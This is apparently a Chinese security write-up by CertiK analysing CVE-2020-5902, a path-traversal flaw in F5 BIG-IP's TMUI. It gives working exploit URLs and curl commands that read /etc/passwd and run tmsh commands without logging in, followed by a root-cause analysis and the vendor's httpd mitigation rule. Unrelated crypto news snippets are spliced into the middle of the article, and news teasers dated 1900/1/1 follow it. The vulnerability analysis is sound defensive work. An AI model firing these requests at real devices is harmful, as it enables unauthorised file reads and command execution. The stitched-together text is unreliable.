今日一早,推特以及各大技术论坛上炸开了锅,安全圈子的人都在讨论F5设备里远程代码执行的漏洞。很多讨论的内容,大部分是在分享如何寻找目标,利用漏洞,并没有关于对漏洞成因的分析。CertiK的安全研究员下载了存在漏洞的程序,搭建环境复现漏洞后,对漏洞的起因进行了分析,并在下文分享给大家。
F5 BIG-IP是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。Positive Technologies的研究人员Mikhail Klyuchnikov 发现其配置工具Traffic Management User Interface(TMUI)中存在远程代码执行漏洞,CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分,攻击者可利用该漏洞创建或删除文件,关闭服务、执行任意的系统命令,最终获得服务器的完全控制权。CVE具体表述请查看文章底部参考链接1。
受影响的BIG-IP软件版本
[15.0.0-15.1.0.3][14.1.0-14.1.2.5][13.1.0-13.1.3.3][12.1.0-12.1.5.1][11.6.1-11.6.5.1]
漏洞利用
首发 | imKey正式支持Filecoin,成为首批Filecoin硬件钱包:12月1日,随着imToken2.7.2版本上线,imKey同步支持Filecoin,成为业内首批正式支持FIL的硬件钱包。Filecoin作为imKey多链支持的优先级项目之一,成为继BTC、ETH、EOS和COSMOS四条公链后的第五条公链。
据悉,imKey团队已在Q4全面启动多链支持计划,计划实现imToken已经支持的所有公链项目,本次imKey升级更新,无需更换硬件,不涉及固件升级,通过应用(Applet)自动升级,即可实现imKey对Filecoin的支持及FIL的代币管理。[2020/12/2 22:52:32]
读取任意文件:
curl-k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
远程执行tmsh命令:
curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
官方给出的临时修复方案(后文会对修复进行分析):
首发 | 火币集团全球业务副总裁:监管将决定区块链技术和加密货币的落地速度:1月21日,火币集团全球业务副总裁Ciara Sun在达沃斯世界经济论坛上表示,对区块链和数字货币的监管态度,2019年是重要的一年。在美国,到2019年底,针对加密货币和区块链政策有21项法案,这些法案包括税收问题,监管结构,跟踪功能和ETF批准,哪些联邦机构监管数字资产等。欧盟(EU)在2020年1月10日实施了一项新法律,要求加密货币平台采取更严格的反做法。瑞士,日本,立陶宛,马耳他和墨西哥通过法律,要求交易所必须根据KYC和AML准则获得许可。中国,土耳其,泰国等国家正在计划自己的中央银行数字货币(CBDC)。而监管将决定区块链技术和加密货币的落地速度。[2020/1/22]
漏洞复现
在F5的官网注册账号之后,可以从F5的资源库中下载存在漏洞的BIG-IP软件。访问参考链接2可以下载BIG-IP TMOS(Traffic Management Operating System, 流量管理操作系统)的虚拟机镜像。CertiK技术团队因为使用Vmware Fusion, 下载的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-Image fileset for VMware ESX/i Server”。
首发 | 刘尧:百度区块链推出天链平台赋能链上业务:12月20日,由CSDN主办的“2019中国区块链开发者大会”12月20日在北京举行。百度智能云区块链产品负责人刘尧以《企业区块链赋能产业创新落地》为主题进行了演讲,他指出:2020年将是区块链企业落地的元年,为了支持中国区块链的产业落地,百度将区块链进行平台化战略升级,依托百度智能云推出天链平台,就是要赋能360行的链上业务创新落地。[2019/12/20]
在Vmware Fusion中加载镜像(import):
加载完成之后,使用默认用户名密码登陆系统:
用户名: root
密码: default
系统初始化之后,使用”ifconfig”命令查询虚拟机IP地址。CertiK技术团队的BIG-IP TMUI虚拟机IP地址为”172.16.4.137”。
在浏览器中访问BIG-IP TMUI登陆界面:
https://172.16.4.137/tmui/login.jsp
首发 | 蚂蚁矿机S17性能曝光 采用全新散热技术及全局优化定制方案:金色财经讯,日前,比特大陆即将发布的蚂蚁矿机S17性能曝光。据蚂蚁矿机S17产品经理朋友圈称,新品将采用新一代散热技术及全局优化定制方案。据了解,该散热技术可能是指芯片的封装技术,也有可能是机器的散热结构设计。至于S17产品“全局优化定制”方案未有细节透露。有声音评价,这或许是为决战丰水期做出的准备。[2019/3/22]
复现任意文件读取:
在浏览器中访问以下地址可以读取”/etc/passwd”文件内容:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
复现tmsh命令执行:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
IMEOS首发 BM表示EOS合约具有整数溢出保护:据金色财经合作媒体IMEOS报道:近日ETH出现多个ERC20智能合约的处理溢出错误,BM在推特上发表评论:新的ETH契约Bug可能会破坏整个Token的供应,让持有者留下无价值Token.这就算为什么代码不能成为法律,随即表示EOS erc合约不容易受到这种攻击。而EOS官方群也有人表示担忧EOS是否具有整数溢出保护?BM回应:有很多C ++模板类可以封装类型并检查溢出。[2018/4/25]
漏洞分析
在进入漏洞分析前,先要明确一点:漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用户登陆后本身是可以被访问的。
下面的截图显示了登陆前和登陆后访问以下URL的区别:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
登陆前访问:
被跳转回登陆界面
输入账号密码登陆管理界面之后再访问,可执行fileRead.jsp读取文件。
fileRead.jsp和tmshCmd.jsp虽然是在PoC中最终被利用的文件,但是他们并不是漏洞的起因。此漏洞的本质是利用Apache和后台Java(tomcat)对URL的解析方式不同来绕过登陆限制, 在未授权的情况下,访问后台JSP模块。CertiK技术人员第一次注意到此类型漏洞是在2018年Orange的BlackHat演讲: “Breaking Parser Logic Take Your Path Normalization Off and Pop 0Days Out”. 这里可以查看演讲稿件(参考链接2)。
这里我们可以理解在F5 BIG-IP的后台服务器对收到了URL请求进行了两次的解析,第一次是httpd(Apache), 第二次是后一层的Java(tomcat).
在URL在第一次被Apache解析时,Apache关注的是URL的前半段
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
当Apache在看见前半段是合法URL且是允许被访问的页面时,就把它交给了后面的第二层。Apache在这里完全把URL里面关键的 /..;/ 给无视了。
在URL在第二次被解析时,后面的Java(tomcat)会把/..;/理解为,向上返回一层路径。此时, /login.jsp/ 和 /..;/ 会抵消掉。Tomcat看到的真正请求从
变成了:
再来fileRead.jsp并没有对收到的请求进行身份验证,后台因此直接执行fileRead.jsp, 读取并返回了/etc/passwd文件的内容。
根据以上的思路,其实可以找出别的利用漏洞的URL, 比如:
https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
这里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一样,是一个不需要登陆就能访问的页面。但是因为要向上返回两次,需要用两个/..;/来抵消掉 ”/login/legal.html”。
回到开头提到的官方给出的临时修复方案, 修复方案的本质是在httpd的配置中添加以下规则:
include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
这个规则的意思是,当http服务器在监测到URL中包含..;(句号句号分号)的时候,直接返回404. 这样利用漏洞的请求就没办法到达后台(第二层)了。
如何避免漏洞:
此漏洞的利用方式在网络上公开之后,因为它的攻击成本低廉,大批黑客都开始图谋利用此漏洞攻击使用F5 BIG-IP产品的系统。黑客只需要付出极小的代价就能获得目标系统的控制权,对系统产生巨大的破坏。
俗话说:“不怕贼偷,就怕贼惦记”。即便这样的黑客攻击事件这次没有发生在你身上,不代表你是安全的。因为很有可能黑客的下一个目标就是你。
而Certik的专业技术团队会帮你彻底打消这种“贼惦记”的担忧。CertiK专业渗透测试团队会通过对此类事件的监测,第一时间给客户提交漏洞预警报告,帮助客户了解漏洞细节以及防护措施。此举可以确保客户的系统不受攻击并且不会遭受财产损失。
同时作为一名安全技术人员,在新漏洞被发现的时,不仅需要知道漏洞是如何被黑客利用的,更要去探寻漏洞背后的原因,方可积累经验,更加有能力在复杂的系统中发现隐藏的漏洞。
CertiK以及其技术人员,将永远把安全当做信仰,与大家一同学习并一同成长。
参考链接
1.https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
2.https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.0.0&container=Virtual-Edition
3.https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
标签:FILFILEHTTPACNDFIL币file币现在什么价https://etherscan.ioSpace Crypto
从盈利性的角度来看,目前中心化普惠金融的状态可能就是DeFi未来的样子。众所周知,无论对于平台还是对于用户来说,理财型盈利往往没有投资型盈利来得可观.
1900/1/1 0:00:00摘 要:The Block对2020年第二季度比特币的市场和链上数据进行了研究;转账的转账费比上一季度增长了136%;本季度闪电网络容量也创下了年内新高;在今年第二季度.
1900/1/1 0:00:00狂人说资产这东西,我们评价它有没有价值,其实不在于资产本身,而在于投资和对他感兴趣的人身上,这个世界上有很多东西其实都不值钱,但因为有人感兴趣,便形成了价值,感兴趣的人越多,其价值越大.
1900/1/1 0:00:00其法律意义一言以概之,在于:通过承认虚拟币是法律上的“财产”,给予其法律上的保护。目前,就被赋予了财产属性的BTC进行盗窃,应成立盗窃罪;这已经是为链圈和法律人所公知的事实.
1900/1/1 0:00:00加密货币交易平台Coinbase开始筹备最早今年上市,或将成为美国首家上市的主要加密货币交易所。据路透社援引消息人士称,加密货币平台Coinbase开始股票上市准备工作.
1900/1/1 0:00:00金色周刊是金色财经推出的一档每周区块链行业总结栏目,内容涵盖一周重点新闻、行情与合约数据、矿业信息、项目动态、技术进展等全行业动态。本文是其中的产业周刊,带您一览本周的区块链产业动态.
1900/1/1 0:00:00